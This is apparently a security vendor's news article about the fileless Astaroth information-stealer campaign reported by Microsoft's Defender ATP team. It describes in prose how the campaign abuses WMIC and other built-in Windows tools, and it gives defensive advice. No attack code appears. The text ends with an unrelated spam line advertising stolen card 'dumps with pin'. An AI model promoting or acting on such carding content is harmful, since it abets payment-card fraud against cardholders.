The Microsoft Defender ATP Research Team released a report covering a malware campaign that dropped the Astaroth trojan into the memory of infected computers. This particular campaign was notable in its distribution method and complex attack chain. It used fileless distribution techniques to hide its activities from security solutions, and abused different legitimate Windows software features to spread quietly.
Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.
During a standard telemetry review, a researcher from the Microsoft Defender ATP Research Team, Andrea Lelli, noted a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, which indicated a fileless technique being used. Upon further investigation, Lelli discovered the Astaroth campaign where attackers were attempting to install the malware directly in the memory of victim devices.
The malware campaign actually runs legitimate Windows tools, which will download additional code and then pass it on. This chain of action is executed in memory, without saving any files on the disk, making it a “fileless execution.” The fileless nature of the campaign makes it difficult for traditional antivirus tools to detect it, although more advanced security solutions are able to defend against such a threat.
[READ: Security 101: Defending Against Fileless Malware ]
Lelli notes that this malware campaign completely “lives off the land,” given that all files run during the attack chain are system tools. By abusing legitimate tools already present on the target system, it tries to disguise its actions as regular activity.
This use of fileless techniques is not new. In fact, in 2018, we saw an uptick in fileless events . And cybercriminals continue to use fileless techniques to update old malware.
But while fileless threats may not be as visible as more traditional ones, they leave telltale signs that can be detected by IT and security teams. Here are some ways enterprises can stay ahead of fileless threats:
To protect against fileless threats that use spam emails as vectors, enterprises can use the Trend Micro endpoint solutions Trend Micro Smart Protection Suites and Worry-Free ™ Business Security . Both solutions protect users and businesses from threats by detecting malicious files and spammed messages, and blocks all related malicious URLs.
Indicators of Compromise
Like it? Add this infographic to your site:1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.
In the first half of this year, cybersecurity strongholds were surrounded by cybercriminals waiting to pounce at the sight of even the slightest crack in defenses to ravage valuable assets. View the report
The upheavals of 2020 challenged the limits of organizations and users, and provided openings for malicious actors. A robust cybersecurity posture can help equip enterprises and individuals amid a continuously changing threat landscape. View the 2020 Annual Cybersecurity Report
legit dumps with pin best cc dump sites